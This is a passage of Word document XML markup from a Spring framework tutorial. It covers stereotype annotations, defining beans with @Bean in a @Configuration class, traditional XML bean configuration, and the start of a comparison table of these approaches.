              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Service layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="47C37950" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B7D4F76" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@Repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="715E3FD3" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DAO/persistence layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="3C3D8FA7" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3111CF0D" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1340E929" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>MVC web controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20BCD7A1" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008E5E16">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2AB42491">
          <v:rect id="_x0000_i2086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A90CCA" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C57ED" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Useful when you need more control over bean creation (e.g., third-party classes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B34B1C" w14:textId="77777777" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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963880"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>@Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00553E81" w14:textId="77777777" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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963880"/>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ppConfig</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14B795B" w14:textId="77777777" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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963880"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277B957E" w14:textId="77777777" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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96388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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B22C72F" w14:textId="77777777" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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96388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Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> myBea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04029B3" w14:textId="77777777" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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96388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Bea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Custom logic, if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088C606B" w14:textId="77777777" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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963880"/>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0FCFA58" w14:textId="28DDF4BE" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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963880"/>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036B0765" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008E5E16">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="5BEBA285">
          <v:rect id="_x0000_i2087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0771A7" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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3. XML Configuration (Traditional, less used now)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A26D74" w14:textId="77777777" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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412914"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;beans</w:t>
      </w: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xmlns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"http://www.springframework.org/schema/beans"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204DA4CE" w14:textId="77777777" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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412914"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       ... </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB82603" w14:textId="77777777" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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412914"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C971D40" w14:textId="77777777" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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41291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lt;bean</w:t>
      </w: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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"myBean"</w:t>
      </w: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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"com.example.MyBean"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A0A20" w14:textId="77777777" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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412914"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12954868" w14:textId="2E38C65F" w:rsidR="007E7D24" w:rsidRPr="00CE4B95"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412914"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/beans&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5573A3FD" w14:textId="61153BC2" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50670743" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This approach was popular before annotations became widely used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FE415D" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">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90"/>
        <w:gridCol w:w="2864"/>
        <w:gridCol w:w="3993"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="41E6DECA" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F1E7337" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="007E7D24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Approach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E36C412" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="007E7D24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Example Syntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="560CBE21" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="007E7D24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use When</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="4B63739D" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50FDCD50" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33BA5F6A" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@Component</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@Service</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FEB27D3" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Most common, easy to use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="36BAE5C7" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41571D16" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
